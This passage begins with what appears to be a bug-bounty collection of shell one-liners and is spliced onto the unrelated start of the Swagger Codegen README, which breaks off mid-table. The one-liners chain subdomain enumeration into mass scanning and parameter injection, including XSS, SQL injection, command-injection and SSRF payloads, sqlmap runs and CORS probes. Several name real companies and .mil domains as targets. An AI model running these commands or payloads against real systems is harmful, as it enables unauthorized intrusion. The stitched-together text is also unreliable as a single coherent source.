'*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' ``` ### Scan All domains using Knoxss - [Explained command] ```bash echo "dominio" | subfinder -silent | gauplus | grep "=" | uro | gf xss | awk '{ print "curl https://knoxss.me/api/v3 -d \"target="$1 "\" -H \"X-API-KEY: APIDOKNOXSS\""}' | sh ``` ### Scan All github repo ORG - [Explained command] ```bash docker run --rm mswell/masstrufflehog -o paypal ``` ### Scan log4j using BBRF and log4j-scan - [Explained command](https://bit.ly/3IUivk9) ```bash bbrf domains | httpx -silent | xargs -I@ sh -c 'python3 http://log4j-scan.py -u "@"' ``` ### SSTI in qsreplase add "{{7*7}}" (0xJin) ```bash cat subdomains.txt | httpx -silent -status-code | gauplus -random-agent -t 200 | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ``` ### urldedupe bhedak - [Explained command] ```bash waybackurls testphp.vulnweb.com | urldedupe -qs | bhedak '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not' ``` ### Hakrawler Airixss XSS - [Explained command] ```bash echo testphp.vulnweb.com | httpx -silent | hakrawler -subs | grep "=" | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" | egrep -v 'Not' ``` ### Airixss XSS - [Explained command] ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)" ``` ### FREQ XSS - [Explained command] ```bash echo testphp.vulnweb.com | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq | egrep -v 'Not' ``` ### Bhedak - [Explained command] ```bash cat urls | bhedak "\"><svg/onload=alert(1)>*'/---+{{7*7}}" ``` ### .bashrc shortcut OFJAAAH ```bash reconjs(){ gau -subs $1 |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> js.txt ; cat js.txt | anti-burl | awk '{print $4}' | sort -u >> AliveJs.txt } cert(){ curl -s "[https://crt.sh/?q=%.$1&output=json](https://crt.sh/?q=%25.$1&output=json)" | jq -r '.[].name_value' | sed 's/\*\.//g' | anew } anubis(){ curl -s "[https://jldc.me/anubis/subdomains/$1](https://jldc.me/anubis/subdomains/$1)" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew } ``` ### Oneliner Haklistgen - @hakluke ```bash subfinder -silent -d domain | anew subdomains.txt | httpx -silent | anew urls.txt | hakrawler | anew endpoints.txt | while read url; do curl $url --insecure | haklistgen | anew wordlist.txt; done cat subdomains.txt urls.txt endpoints.txt | haklistgen | anew wordlist.txt; ``` ### Running JavaScript on each page send to proxy. - [Explained command] ```bash cat 200http | page-fetch --javascript '[...document.querySelectorAll("a")].map(n => n.href)' --proxy http://192.168.15.47:8080 ``` ### Running cariddi to Crawler - [Explained command] ```bash echo tesla.com | subfinder -silent | httpx -silent | cariddi -intensive ``` ### Dalfox scan to bugbounty targets. - [Explained command] ```bash xargs -a xss-urls.txt -I@ bash -c 'python3 /dir-to-xsstrike/xsstrike.py -u @ --fuzzer' ``` ### Dalfox scan to bugbounty targets. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @ ``` ### Using x8 to Hidden parameters discovery - [Explaining command] ```bash assetfinder domain | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w params.txt -o enumerate' ``` ### Extract .js Subdomains - [Explaining command] ```bash echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1 ``` ### goop to search .git files. - [Explaining command] ```bash xargs -a xss -P10 -I@ sh -c 'goop @' ``` ### Using chaos list to enumerate endpoint ```bash curl -s https://raw.githubusercontent.com/projectdiscovery/public-bugbounty-programs/master/chaos-bugbounty-list.json | jq -r '.programs[].domains[]' | xargs -I@ sh -c 'python3 paramspider.py -d @' ``` ### Using Wingman to search XSS reflect / DOM XSS - [Explaining command] ```bash xargs -a domain -I@ sh -c 'wingman -u @ --crawl | notify' ``` ### Search ASN to metabigor and resolvers domain - [Explaining command] ```bash echo 'dod' | metabigor net --org -v | awk '{print $3}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew' ``` ### OneLiners ### Search .json gospider filter anti-burl - [Explaining command] ```bash gospider -s https://twitch.tv --js | grep -E "\.js(?:onp?)?$" | awk '{print $4}' | tr -d "[]" | anew | anti-burl ``` ### Search .json subdomain - [Explaining command] ```bash assetfinder http://tesla.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew ``` ### SonarDNS extract subdomains - [Explaining command] ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-02-26-1614298023-fdns_a.json.gz ; gunzip 2021-02-26-1614298023-fdns_a.json.gz ; cat 2021-02-26-1614298023-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command] ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command] ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command] ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command] ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command] ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command] ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command] ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command] ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command] ```bash chaos -d $1 -o chaos1 -silent ; assetfinder -subs-only $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 -silent ; cat assetfinder1 subfinder1 chaos1 >> hosts ; cat hosts | anew clearDOMAIN ; httpx -l hosts -silent -threads 100 | anew http200 ; rm -rf chaos1 assetfinder1 subfinder1 ``` ### Download all domains to bounty chaos - [Explaining command] ```bash curl https://chaos-data.projectdiscovery.io/index.json | jq -M '.[] | .URL | @sh' | xargs -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command] ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command] ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command] Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all tld's in that IP space (paypal.com, paypal.co.id, paypal.me) ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### SQLINJECTION Mass domain file - [Explaining command] ```bash httpx -l domains -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1' ``` ### Using chaos search js - [Explaining command] Chaos is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command] GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) we use some blacklist, so that it doesn’t travel, not to delay, grep is a command-line utility for searching plain-text data sets for lines that match a regular expression to search HTTP and HTTPS ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command] GoSpider to visit them and crawl them for all links (javascript, endpoints, etc) chaos is a subdomain search project, to use it needs the api, to xargs is a command on Unix and most Unix-like operating systems used to build and execute commands from standard input. ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command] We will use recon.dev api to extract ready subdomains infos, then parsing output json with jq, replacing with a Stream EDitor all blank spaces If anew, we can sort and display unique domains on screen, redirecting this output list to httpx to create a new list with just alive domains. Xargs is being used to deal with gospider with 3 parallel proccess and then using grep within regexp just taking http urls. ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -P3 -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### PSQL - search subdomain using cert.sh - [Explaining command] Make use of pgsql cli of crt.sh, replace all comma to new lines and grep just twitch text domains with anew to confirm unique outputs ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew ``` ### Search subdomains using github and httpx - [Github-search] Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained command] ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained command] ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained command] ```bash assetfinder -subs-only tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained command] ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained command] ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained command] ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained command] ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained command] ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained command] ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained command] ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained command] ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained command] Shodan is a search engine that lets the user find specific types of computers connected to the internet, AWK Cuts the text and prints the third column. httpx is a fast and multi-purpose HTTP using -silent. Nuclei is a fast tool for configurable targeted scanning based on templates offering massive extensibility and ease of use, You need to download the nuclei templates. ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained command] echo is a command that outputs the strings it is being passed as arguments. What to Waybackurls? Accept line-delimited domains on stdin, fetch known URLs from the Wayback Machine for .domain.com and output them on stdout. Httpx? is a fast and multi-purpose HTTP. GF? A wrapper around grep to avoid typing common patterns and anew Append lines from stdin to a file, but only if they don't already appear in the file. Outputs new lines to stdout too, removes duplicates. ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained command] ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained command] To chaos this project to projectdiscovery, Recon subdomains, using httpx, if we see the output from chaos domain.com we need it to be treated as http or https, so we use httpx to get the results. We use anew, a tool that removes duplicates from @TomNomNom, to get the output treated for import into jaeles, where he will scan using his templates. ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained command] ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained command] ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### HTTPX using new mode location and injection XSS using qsreplace. - [Explained command] ```bash httpx -l master.txt -silent -no-color -threads 300 -location 301,302 | awk '{print $2}' | grep -Eo '(http|https)://[^/"].*' | tr -d '[]' | anew | xargs -I@ sh -c 'gospider -d 0 -s @' | tr ' ' '\n' | grep -Eo '(http|https)://[^/"].*' | grep "=" | qsreplace "<svg onload=alert(1)>" "' ``` ### Grap internal juicy paths and do requests to them. - [Explained command] ```bash export domain="https://target";gospider -s $domain -d 3 -c 300 | awk '/linkfinder/{print $NF}' | grep -v "http" | grep -v "http" | unfurl paths | anew | xargs -I@ -P50 sh -c 'echo $domain@ | httpx -silent -content-length' ``` ### Download to list bounty targets We inject using the sed .git/HEAD command at the end of each url. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv | cat domains.txt | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Using to findomain to SQLINJECTION. - [Explained command] ```bash findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1 ``` ### Jaeles scan to bugbounty targets. - [Explained command] ```bash wget https://raw.githubusercontent.com/arkadiyt/bounty-targets-data/master/data/domains.txt -nv ; cat domains.txt | anew | httpx -silent -threads 500 | xargs -I@ jaeles scan -s /jaeles-signatures/ -u @ ``` ### JLDC domain search subdomain, using rush and jaeles. - [Explained command] ```bash curl -s "https://jldc.me/anubis/subdomains/sony.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | httpx -silent -threads 300 | anew | rush -j 10 'jaeles scan -s /jaeles-signatures/ -u {}' ``` ### Chaos to search subdomains check cloudflareip scan port. - [Explained command] ```bash chaos -silent -d paypal.com | filter-resolved | cf-check | anew | naabu -rate 60000 -silent -verify | httpx -title -silent ``` ### Search JS to domains file. - [Explained command] ```bash cat FILE TO TARGET | httpx -silent | subjs | anew ``` ### Search JS using assetfinder, rush and hakrawler. - [Explained command] ```bash assetfinder -subs-only paypal.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | rush 'hakrawler -plain -linkfinder -depth 5 -url {}' | grep "paypal" ``` ### Search to CORS using assetfinder and rush - [Explained command] ```bash assetfinder fitbit.com | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin:evil.com" {} | [[ $(grep -c "evil.com") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] - {}\e[m"' ``` ### Search to js using hakrawler and rush & unew - [Explained command] ```bash cat hostsGospider | rush -j 100 'hakrawler -js -plain -usewayback -depth 6 -scope subs -url {} | unew hakrawlerHttpx' ``` ### XARGS to dirsearch brute force. - [Explained command] ```bash cat hosts | xargs -I@ sh -c 'python3 dirsearch.py -r -b -w path -u @ -i 200, 403, 401, 302 -e php,html,json,aspx,sql,asp,js' ``` ### Assetfinder to run massdns. - [Explained command] ```bash assetfinder DOMAIN --subs-only | anew | massdns -r lists/resolvers.txt -t A -o S -w result.txt ; cat result.txt | sed 's/A.*//; s/CN.*// ; s/\..$//' | httpx -silent ``` ### Extract path to js - [Explained command] ```bash cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u ``` ### Find subdomains and Secrets with jsubfinder - [Explained command] ```bash cat subdomsains.txt | httpx --silent | jsubfinder search -s ``` ### Search domains to Range-IPS. - [Explained command] ```bash cat dod1 | awk '{print $1}' | xargs -I@ sh -c 'prips @ | hakrevdns -r 1.1.1.1' | awk '{print $2}' | sed -r 's/.$//g' | httpx -silent -timeout 25 | anew ``` ### Search new's domains using dnsgen. - [Explained command] ```bash xargs -a army1 -I@ sh -c 'echo @' | dnsgen - | httpx -silent -threads 10000 | anew newdomain ``` ### List ips, domain extract, using amass + wordlist - [Explained command] ```bash amass enum -src -ip -active -brute -d navy.mil -o domain ; cat domain | cut -d']' -f 2 | awk '{print $1}' | sort -u > hosts-amass.txt ; cat domain | cut -d']' -f2 | awk '{print $2}' | tr ',' '\n' | sort -u > ips-amass.txt ; curl -s "https://crt.sh/?q=%.navy.mil&output=json" | jq '.[].name_value' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u > hosts-crtsh.txt ; sed 's/$/.navy.mil/' dns-Jhaddix.txt_cleaned > hosts-wordlist.txt ; cat hosts-amass.txt hosts-crtsh.txt hosts-wordlist.txt | sort -u > hosts-all.txt ``` ### Search domains using amass and search vul to nuclei. - [Explained command] ```bash amass enum -passive -norecursive -d disa.mil -o domain ; httpx -l domain -silent -threads 10 | nuclei -t PATH -o result -timeout 30 ``` ### Verify to cert using openssl. - [Explained command] ```bash sed -ne 's/^\( *\)Subject:/\1/p;/X509v3 Subject Alternative Name/{ N;s/^.*\n//;:a;s/^\( *\)\(.*\), /\1\2\n\1/;ta;p;q; }' < <( openssl x509 -noout -text -in <( openssl s_client -ign_eof 2>/dev/null <<<$'HEAD / HTTP/1.0\r\n\r' \ -connect hackerone.com:443 ) ) ``` ### Search domains using openssl to cert. - [Explained command] ```bash xargs -a recursivedomain -P50 -I@ sh -c 'openssl s_client -connect @:443 2>&1 '| sed -E -e 's/[[:blank:]]+/\n/g' | httpx -silent -threads 1000 | anew ``` ### Search to Hackers. - [Censys](https://censys.io) - [Spyce](https://spyce.com) - [Shodan](https://shodan.io) - [Viz Grey](https://viz.greynoise.io) - [Zoomeye](https://zoomeye.org) - [Onyphe](https://onyphe.io) - [Wigle](https://wigle.net) - [Intelx](https://intelx.io) - [Fofa](https://fofa.so) - [Hunter](https://hunter.io) - [Zorexeye](https://zorexeye.com) - [Pulsedive](https://pulsedive.com) - [Netograph](https://netograph.io) - [Vigilante](https://vigilante.pw) - [Pipl](https://pipl.com) - [Abuse](https://abuse.ch) - [Cert-sh](https://cert.sh) - [Maltiverse](https://maltiverse.com/search) - [Insecam](https://insecam.org) - [Anubis](https://https://jldc.me/anubis/subdomains/att.com) - [Dns Dumpster](https://dnsdumpster.com) - [PhoneBook](https://phonebook.cz) - [Inquest](https://labs.inquest.net) - [Scylla](https://scylla.sh) # Project [![made-with-Go](https://img.shields.io/badge/Made%20with-Go-1f425f.svg)](http://golang.org) [![made-with-bash](https://img.shields.io/badge/Made%20with-Bash-1f425f.svg)](https://www.gnu.org/software/bash/) [![Open Source? Yes!](https://badgen.net/badge/Open%20Source%20%3F/Yes%21/blue?icon=github)](https://github.com/Naereen/badges/) [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/KingOfTipsBugBounty) <a href="https://www.buymeacoffee.com/OFJAAAH" target="_blank"><img src="https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png" alt="Buy Me A Coffee" style="height: 20px !important;width: 50px !important;box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;-webkit-box-shadow: 0px 3px 2px 0px rgba(190, 190, 190, 0.5) !important;" ></a>
# Swagger Code Generator [![Build Status](https://img.shields.io/travis/swagger-api/swagger-codegen/master.svg?label=Petstore%20Integration%20Test)](https://travis-ci.org/swagger-api/swagger-codegen) [![Run Status](https://img.shields.io/shippable/5782588a3be4f4faa56c5bea.svg?label=Mustache%20Template%20Test)](https://app.shippable.com/projects/5782588a3be4f4faa56c5bea) [![Windows Test](https://ci.appveyor.com/api/projects/status/github/swagger-api/swagger-codegen?branch=master&svg=true&passingText=Windows%20Test%20-%20OK&failingText=Windows%20Test%20-%20Fails)](https://ci.appveyor.com/project/WilliamCheng/swagger-codegen-wh2wu) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/io.swagger/swagger-codegen-project) [![PR Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/pr)](http://issuestats.com/github/swagger-api/swagger-codegen) [![Issue Stats](http://issuestats.com/github/swagger-api/swagger-codegen/badge/issue)](http://issuestats.com/github/swagger-api/swagger-codegen) :star::star::star: If you would like to contribute, please refer to [guidelines](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md) and a list of [open tasks](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22).:star::star::star: :notebook_with_decorative_cover: For more information, please refer to the [Wiki page](https://github.com/swagger-api/swagger-codegen/wiki) and [FAQ](https://github.com/swagger-api/swagger-codegen/wiki/FAQ) :notebook_with_decorative_cover: :warning: If the OpenAPI/Swagger spec is obtained from an untrusted source, please make sure you've reviewed the spec before using Swagger Codegen to generate the API client, server stub or documentation as [code injection](https://en.wikipedia.org/wiki/Code_injection) may occur :warning: :rocket: ProductHunt: https://producthunt.com/posts/swagger-codegen :rocket: ## Overview This is the swagger codegen project, which allows generation of API client libraries (SDK generation), server stubs and documentation automatically given an [OpenAPI Spec](https://github.com/OAI/OpenAPI-Specification). Currently, the following languages/frameworks are supported: - **API clients**: **ActionScript**, **Bash**, **C#** (.net 2.0, 4.0 or later), **C++** (cpprest, Qt5, Tizen), **Clojure**, **Dart**, **Elixir**, **Go**, **Groovy**, **Haskell**, **Java** (Jersey1.x, Jersey2.x, OkHttp, Retrofit1.x, Retrofit2.x, Feign), **Node.js** (ES5, ES6, AngularJS with Google Closure Compiler annotations) **Objective-C**, **Perl**, **PHP**, **Python**, **Ruby**, **Scala**, **Swift** (2.x, 3.x), **Typescript** (Angular1.x, Angular2.x, Fetch, Node) - **Server stubs**: **C#** (ASP.NET Core, NancyFx), **Erlang**, **Go**, **Haskell**, **Java** (MSF4J, Spring, Undertow, JAX-RS: CDI, CXF, Inflector, RestEasy), **PHP** (Lumen, Slim, Silex, [Zend Expressive](https://github.com/zendframework/zend-expressive)), **Python** (Flask), **NodeJS**, **Ruby** (Sinatra, Rails5), **Scala** ([Finch](https://github.com/finagle/finch), Scalatra) - **API documentation generators**: **HTML**, **Confluence Wiki** - **Others**: **JMeter** Check out [OpenAPI-Spec](https://github.com/OAI/OpenAPI-Specification) for additional information about the OpenAPI project. # Table of contents - [Swagger Code Generator](#swagger-code-generator) - [Overview](#overview) - [Table of Contents](#table-of-contents) - Installation - [Compatibility](#compatibility) - [Prerequisites](#prerequisites) - [OS X Users](#os-x-users) - [Building](#building) - [Docker](#docker) - [Build and run](#build-and-run-using-docker) - [Run docker in Vagrant](#run-docker-in-vagrant) - [Public Docker image](#public-docker-image) - [Homebrew](#homebrew) - [Getting Started](#getting-started) - Generators - [To generate a sample client library](#to-generate-a-sample-client-library) - [Generating libraries from your server](#generating-libraries-from-your-server) - [Modifying the client library format](#modifying-the-client-library-format) - [Making your own codegen modules](#making-your-own-codegen-modules) - [Where is Javascript???](#where-is-javascript) - [Generating a client from local files](#generating-a-client-from-local-files) - [Customizing the generator](#customizing-the-generator) - [Validating your OpenAPI Spec](#validating-your-openapi-spec) - [Generating dynamic html api documentation](#generating-dynamic-html-api-documentation) - [Generating static html api documentation](#generating-static-html-api-documentation) - [To build a server stub](#to-build-a-server-stub) - [To build the codegen library](#to-build-the-codegen-library) - [Workflow Integration](#workflow-integration) - [Github Integration](#github-integration) - [Online Generators](#online-generators) - [Guidelines for Contribution](https://github.com/swagger-api/swagger-codegen/wiki/Guidelines-for-Contribution) - [Companies/Projects using Swagger Codegen](#companiesprojects-using-swagger-codegen) - [Swagger Codegen Core Team](#swagger-codegen-core-team) - [Swagger Codegen Evangelist](#swagger-codegen-evangelist) - [License](#license) ## Compatibility The OpenAPI Specification has undergone 3 revisions since initial creation in 2010. The swagger-codegen project has the following compatibilities with the OpenAPI Specification: Swagger Codegen Version | Release Date | OpenAPI Spec compatibility | Notes -------------------------- | ------------ | -------------------------- | ----- 2.3.0 (upcoming minor release) | Apr/May 2017 | 1.0, 1.1, 1.2, 2.0 | Minor release with breaking changes 2.2.3 (upcoming patch release) | TBD | 1.0, 1.1, 1.2, 2.0 | Patch release without breaking changes 2.2.2 (**current stable**) | 2017-03-01 | 1.0, 1.1, 1.2, 2.0 | [tag v2.2.2](https://github.com/swagger-api/swagger-codegen/tree/v2.2.2) 2.2.1 | 2016-08-07 | 1.0, 1.1, 1.2, 2.0 | [tag 